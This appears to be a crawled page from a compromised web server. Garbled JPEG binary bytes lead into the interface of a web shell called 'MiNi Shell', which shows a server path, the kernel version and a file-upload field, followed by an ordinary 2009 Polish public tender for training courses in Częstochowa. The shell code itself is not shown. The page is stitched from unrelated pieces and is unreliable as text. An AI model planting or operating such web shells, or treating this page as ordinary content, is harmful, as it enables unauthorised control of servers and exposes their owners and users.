JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090710/233044-N-2009.html

<p class="kh_header"><b>Częstochowa: Przetarg nieograniczony na realizację szkoleń dla podopiecznych Powiatowego Centrum Pomocy Rodzinie w Częstochowie.</b><br>
<b>Numer ogłoszenia: 233044 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Częstochowie , ul. Tkacka 3/5, 42-200 Częstochowa, woj. śląskie, tel. 0-34 322 92 06, faks 0-34 322 92 07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na realizację szkoleń dla podopiecznych Powiatowego Centrum Pomocy Rodzinie w Częstochowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń grupowych finansowanych w ramach projektu systemowego pt. Dobry Start. Promowanie aktywnej integracji społecznej i zawodowej w powiecie częstochowskim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dla klientów Powiatowego Centrum Pomocy Rodzinie w Częstochowie.
2. Przedmiot zamówienia został podzielony na 16 odrębnych zadań. Szczegółowe wymagania oraz zakres poszczególnych kursów określa Rozdział II. 
Zadanie nr 1 - kursy prawa jazdy kategorii B. 
Zadanie nr 2 - kursy prawa jazdy kategorii C.
Zadanie nr 3 - kursy prawa jazdy kategorii C+E.
Zadanie nr 4 -kurs przewozu rzeczy.
Zadanie nr 5 - kurs spawania.
Zadanie nr 6 - kurs masażu.
Zadanie nr 7 - kurs kosmetyczny.
Zadanie nr 8 - kurs stylizacji paznokci.
Zadanie nr 9 - kurs nt. prowadzenia działalności gospodarczej.
Zadanie nr 10 - kurs przedstawiciela handlowego bez prawa jazdy.
Zadanie nr 11- kurs obsługi klienta.
Zadanie nr 12 - kurs magazyniera, wózek widłowy.
Zadanie nr 13 - kurs języka angielskiego
Zadanie nr 14 - kurs języka niemieckiego.
Zadanie nr 15 - kurs języka francuskiego.
Zadanie nr 16 - kurs języka migowego.
3. Wynagrodzenie wykonawcy obejmować będzie koszty przeprowadzenia zajęć teoretycznych i praktycznych przez wykładowców i instruktorów zgodnie z wymaganiami zamawiającego, koszty niezbędnych materiałów szkoleniowych i biurowych dla wszystkich kursantów (nie mogą to być kserokopie) i 1 egz. dla zamawiającego, koszty innych dokumentów, odzieży ochronnej, sprzętu i badań lekarskich, wymaganych przez zamawiającego, określonych w Rozdziale II, jak również koszty ubezpieczenia NNW wszystkich kursantów na czas uczestnictwa w kursach oraz egzaminów, jeżeli będą odpłatne. 
4. Warunki płatności - Zamawiający zapłaci Wykonawcy wynagrodzenie za faktycznie przeszkoloną ilość osób. Wykonawca prowadzić będzie dziennik zajęć zawierający listę obecności, wymiar godzin i tematy edukacyjne, rejestr wydawanych zaświadczeń potwierdzających ukończenie kursu i zdobycie kwalifikacji oraz sporządzi protokół z egzaminu. Zapłata za szkolenie nastąpi niezwłocznie po otrzymaniu środków finansowych z Europejskiego Funduszu Społecznego na podstawie wystawionego przez Wykonawcę rachunku/faktury VAT wraz z zestawieniem faktycznie poniesionych wydatków składających się na kwotę faktury oraz załączonym wykazem osób przeszkolonych, protokołem z egzaminu, kserokopiami zaświadczeń o ukończeniu szkolenia, listami obecności na zajęciach osób skierowanych na szkolenie. Zamawiający, na podstawie podanej całkowitej ceny szkolenia oraz ilości uczestników i godzin szkolenia, obliczy koszt jednostkowy szkolenia oraz osobogodzinę (cena ofertowa zostanie podzielona przez liczbę uczestników i godzin).
5. Kod CPV: 80530000-8, 805580000-3, 80411200-0.
6. Terminy realizacji: od dnia zawarcia umowy do 15 grudnia 2009 roku. Zamawiający, w przypadku opóźnień wynikających z przyczyn leżących po stronie uczestników szkolenia, dopuszcza możliwość wydłużenia ostatecznego terminu realizacji przedmiotu zamówienia o 7 dni.
7. Miejsce realizacji usług. 
Wykonawca przeprowadzi kursy w odpowiednio przystosowanych pomieszczeniach pozostających w jego dyspozycji, wyposażonych w sprzęt audio-wizualny (jeśli zaistnieje potrzeba jego użytkowania) i inny, niezbędny do realizacji zajęć praktycznych. Każdy z uczestników szkolenia będzie miał zapewniony dostęp do samodzielnego stanowiska pracy w trakcie zajęć praktycznych. Szkolenia wymienione w zadaniach od 1 do 15 muszą się odbywać na terenie Częstochowy lub powiatu częstochowskiego.
8. Wykonawca zobowiązuje się umieszczać aktualnie obowiązujące loga: Projektu Operacyjnego Kapitał Ludzki, Europejskiego Funduszu Społecznego, emblemat Unii Europejskiej oraz informację o realizowaniu szkolenia w ramach projektu systemowego pt. Dobry Start. Promowanie aktywnej integracji społecznej i zawodowej w powiecie częstochowskim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, na wszystkich dokumentach związanych z organizacją szkolenia takich jak: harmonogram szkolenia, zaświadczenia o ukończeniu szkolenia, certyfikaty, dyplomy, listy obecności, wykaz osób, które ukończyły szkolenie, protokół z egzaminu, itp. (informacje dot. promocji znajdują się na stronie internetowej pod adresem www.silesia-region.pl lub zostaną dostarczone przez zamawiającego)
W miejscu organizacji zajęć szkoleniowych należy umieszczać plakaty, przekazane przez Zamawiającego, informujące o organizacji szkolenia realizowanego w ramach projektu systemowego pt. Dobry Start. Promowanie aktywnej integracji społecznej i zawodowej w powiecie częstochowskim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
9. Prowadzący szkolenia (wykładowcy) powinni być poinformowani o fakcie, iż w szkoleniu uczestniczą osoby, których udział jest współfinansowany w ramach projektu systemowego pt. Dobry Start. Promowanie aktywnej integracji społecznej i zawodowej w powiecie częstochowskim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający przeprowadzi w swojej siedzibie ankietę wśród uczestników na temat odbytych szkoleń.
10. Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności zgodnie z wzorem przekazanym przez Zamawiającego/dzienniku zajęć edukacyjnych.
11. Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.55.80.00-3, 80.41.12.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wszyscy Wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania działalności lub czynności stanowiących przedmiot zamówienia, 
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj. wykażą przeprowadzenie w ciągu ostatnich 3 lat (licząc od dnia 10.07.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego szkolenia o tematyce tożsamej z przedmiotem zamówienia dla co najmniej 10 osób,
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 22 ust. 1 pkt. 4 Ustawy w związku z art. 24 ust. 1, 2 Ustawy) 
Spełnienie w/w warunków oceniane będzie przez Zamawiającego wg formuły spełnia nie spełnia na podstawie oświadczenia Wykonawcy oraz załączonych do niego dokumentów wymienionych w pkt VII specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawcy powinni załączyć do oferty następujące oświadczenia i dokumenty:
1) oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 oraz nie podleganiu wykluczeniu na podstawie art. 24 ust.1  Ustawy - wzór załącznik nr 2;
2) oświadczenie o nie zaleganiu z opłaceniem podatku, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne - wzór załącznik nr 3
3) aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4) aktualne zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
5) aktualne zezwolenie na prowadzenie szkoleń wydane przez właściwy organ zgodnie z ustawą z dnia 20.06.1997 r. - Prawo o ruchu drogowym w przypadku składania ofert częściowych na wszystkie kategorie prawa jazdy wymienione w zał. nr 2 Opis przedmiotu zamówienia - ważne minimum do 31.12.2009 r.
6) atest Instytutu Spawalnictwa w Gliwicach informujący o uprawnieniach Wykonawcy do szkolenia oraz egzaminowania spawaczy w zakresie metod zawartych w niniejszej Specyfikacji Istotnych Warunków Zamówienia w przypadku składania oferty częściowej na kursy dotyczące spawania wszystkimi wymienionymi metodami w Rozdziale II Opis przedmiotu zamówienia - ważny minimum do 31.12.2009 r
7) Certyfikat wydany przez Ośrodek Doskonalenia Kadr w Mysłowicach potwierdzający uzyskanie Wykonawcy uprawnień do prowadzenia kursów oraz wydawania zaświadczeń w zakresie Wózki jezdniowe z napędem silnikowym w przypadku składania oferty częściowej na kurs magazyniera,
8) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia (wskazać szkolenia, jakie przeprowadziły w okresie ostatnich 3 lat) i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - wzór załącznik nr 5
9) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeżeli w wykazie, o którym mowa w pkt 8 wykonawca wskazał osoby, którymi będzie dysponował.
10) wykaz przeprowadzonych w ciągu ostatnich 3 lat (licząc od dnia 10.07.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, szkoleń o tematyce tożsamej z przedmiotem zamówienia dla co najmniej 10 osób każde - wzór załącznik nr 4 - dotyczy zadań nr 1 - 5, 7, 9 - 15;
11) wykaz przeprowadzonych w ciągu ostatnich 3 lat (licząc od dnia 10.07.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, szkoleń o tematyce tożsamej z przedmiotem zamówienia- wzór załącznik nr 4 - dotyczy zadań nr 6, 8, 16;
12) dokumenty potwierdzające należytą realizację usług wykazanych zgodnie z pkt 10 i 11 (np. referencje)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pcprczestochowa.4bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Częstochowie
ul. Tkacka 5, 42-200 Częstochowa
pokój 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 08:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Częstochowie
ul. Tkacka 5, 42-200 Częstochowa
pokój 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com